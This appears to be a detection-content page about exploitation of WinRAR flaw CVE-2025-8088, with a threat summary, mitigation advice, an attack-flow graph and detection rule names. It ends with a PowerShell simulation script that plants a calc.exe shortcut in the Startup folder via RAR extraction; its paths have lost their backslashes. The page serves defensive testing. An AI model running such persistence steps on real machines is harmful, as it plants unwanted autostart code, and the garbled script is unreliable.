Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Google Threat Intelligence Group reports broad exploitation of CVE-2025-8088, a high-severity WinRAR path traversal flaw. Adversaries use it to place malicious files into the Windows Startup folder to gain persistence. Both state-sponsored and financially motivated groups are leveraging the exploit to deliver RATs, downloaders, and follow-on payloads. The report shares indicators plus detection and mitigation guidance.
Investigation
Researchers tied several actors—UNC4895, APT44, Turla, and a PRC-based group—to crafted RAR archives that abuse Alternate Data Streams (ADS) to drop LNK, HTA, or BAT files into Startup. Some archives staged LNK handlers that launch HTA or BAT at logon. Malware families observed include NESTPACKER, POISONIVY, XWorm, and AsyncRAT. Shared infrastructure and reused exploit code appeared across campaigns targeting Ukraine and other regions.
Mitigation
Upgrade WinRAR to 7.13+ and enforce application allow-lists. Reduce ADS exposure where possible and monitor the Startup folder for new LNK, HTA, BAT, or script files. Apply Google Safe Browsing and email security controls to stop malicious archives earlier.
Response
Detect Startup-path file creation tied to RAR extraction, especially shortcuts and scripts. Correlate alerts with known filenames and hashes, quarantine affected hosts, confirm the malware family, and remove Startup persistence during incident response.
"graph TB %% Class definitions classDef technique fill:#99ccff classDef file fill:#ffcc99 classDef process fill:#ccffcc classDef tool fill:#cccccc %% Node definitions tech_phishing["<b>Technique</b> – <b>T1566.001 Spearphishing Attachment</b><br/>Adversary sends targeted email with malicious RAR archive"] class tech_phishing technique file_rar["<b>File</b> – <b>Name</b>: malicious.rar<br/>Contains decoy PDF and ADS payload"] class file_rar file tech_user_exec["<b>Technique</b> – <b>T1204.002 User Execution</b><br/>Victim opens RAR causing extraction"] class tech_user_exec technique file_ads["<b>File</b> – <b>Type</b>: Alternate Data Stream (ADS)<br/>Payload: innocuous.pdf:malicious.lnk"] class file_ads file tech_exploit["<b>Technique</b> – <b>T1203 Exploitation for Client Execution</b><br/>Uses CVE-2025-8088 path traversal to write .lnk"] class tech_exploit technique file_lnk["<b>File</b> – <b>Name</b>: malicious.lnk<br/>Placed in Windows Startup folder"] class file_lnk file tech_persistence["<b>Technique</b> – <b>T1547.009 Shortcut Modification</b><br/>Shortcut in Startup provides persistence"] class tech_persistence technique tech_cmd["<b>Technique</b> – <b>T1059.003 Command Shell</b><br/>Batch or .cmd scripts download additional payloads"] class tech_cmd technique tool_ratrat["<b>Tool</b> – <b>Name</b>: XWorm / AsyncRAT<br/>Remote access trojan"] class tool_ratrat tool tech_mshta["<b>Technique</b> – <b>T1218.005 Mshta Proxy Execution</b><br/>HTA files launched via mshta.exe"] class tech_mshta technique file_hta["<b>File</b> – <b>Name</b>: payload.hta<br/>Executed with mshta"] class file_hta file process_mshta["<b>Process</b> – <b>Name</b>: mshta.exe<br/>Executes HTA file"] class process_mshta process %% Connections showing attack flow tech_phishing –>|delivers| file_rar file_rar –>|extracted by| tech_user_exec tech_user_exec –>|creates| file_ads file_ads –>|used by| tech_exploit tech_exploit –>|writes| file_lnk file_lnk –>|enables| tech_persistence tech_persistence –>|triggers| tech_cmd tech_cmd –>|downloads| tool_ratrat tech_cmd –>|drops| file_hta tech_cmd –>|launches| tech_mshta tech_mshta –>|executes| file_hta file_hta –>|run by| process_mshta process_mshta –>|executes| tech_mshta "
Attack Flow
Detections
Suspicious Extracted Files from an Archive (via file_event)
View
Suspicious Binary / Scripts in Autostart Location (via file_event)
View
Possible CVE-2025-8088 / CVE-2025-6218 (WinRAR Vulnerability) Exploitation Attempt (via file_event)
View
IOCs (HashSha256) to detect: Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088 Part 2
View
IOCs (HashSha256) to detect: Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088 Part 1
View
Detection of Malicious LNK Files in WinRAR Archives for Persistence [Windows File Event]
View
Detection of Malicious LNK File in WinRAR Archive Exploiting CVE-2025-8088 [Windows File Event]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An attacker crafts a malicious RAR archive that embeds a Windows shortcut (malicious.lnk) as an Alternate Data Stream attached to a benign‑looking PDF (innocuous.pdf). Leveraging CVE‑2025‑8088, the attacker knows WinRAR will extract the ADS directly into the target path without sanitising the stream name. The archive is delivered to the victim machine (e.g., via phishing). The attacker then runs WinRAR in silent mode to extract the payload straight into the current user’s Startup folder, achieving persistence.- Create the malicious LNK payload (a shortcut that launches
cmd.exe /c calc.exe). - Attach the LNK as an ADS to
innocuous.pdfinside the RAR. - Deliver the RAR to the victim.
- Execute WinRAR extraction to the Startup directory.
- Create the malicious LNK payload (a shortcut that launches
-
Regression Test Script:
# -------------------------------------------------------------- # PowerShell script to simulate CVE‑2025‑8088 LNK‑ADS persistence # -------------------------------------------------------------- # 1. Variables $tempDir = "$envTEMPLNK_ADS_Test" $pdfPath = "$tempDirinnocuous.pdf" $lnkPath = "$tempDirmalicious.lnk" $rarPath = "$tempDirmalicious.rar" $startupPath = "$envAPPDATAMicrosoftWindowsStart MenuProgramsStartup" # Ensure clean workspace Remove-Item -Recurse -Force $tempDir -ErrorAction SilentlyContinue New-Item -ItemType Directory -Path $tempDir | Out-Null # 2. Create a dummy PDF (empty file works for ADS demonstration) New-Item -ItemType File -Path $pdfPath | Out-Null # 3. Create malicious LNK pointing to calculator $ws = New-Object -ComObject WScript.Shell $shortcut = $ws.CreateShortcut($lnkPath) $shortcut.TargetPath = "calc.exe" $shortcut.WindowStyle = 1 $shortcut.Save() # 4. Pack PDF and attach LNK as ADS using WinRAR CLI # The syntax creates an ADS named "malicious.lnk" attached to the PDF. & "C:Program FilesWinRARWinRAR.exe" a -df $rarPath $pdfPath "$lnkPath:malicious.lnk" # 5. Extract RAR directly to the Startup folder (silent mode) & "C:Program FilesWinRARWinRAR.exe" x -inul $rarPath $startupPath # 6. Verify that the LNK now exists in Startup (will be visible as a regular .lnk) $extractedLnk = Join-Path $startupPath "malicious.lnk" if (Test-Path $extractedLnk) { Write-Host "[+] Malicious shortcut deployed to Startup: $extractedLnk" } else { Write-Error "[-] Shortcut not found – extraction may have failed." } # -------------------------------------------------------------- # End of script # -------------------------------------------------------------- -
Cleanup Commands:
# Remove the malicious shortcut from Startup $lnk = "$envAPPDATAMicrosoftWindowsStart MenuProgramsStartupmalicious.lnk" if (Test-Path $lnk) { Remove-Item -Force $lnk } # Delete temporary files and directories $temp = "$envTEMPLNK_ADS_Test" if (Test-Path $temp) { Remove-Item -Recurse -Force $temp }
End of Report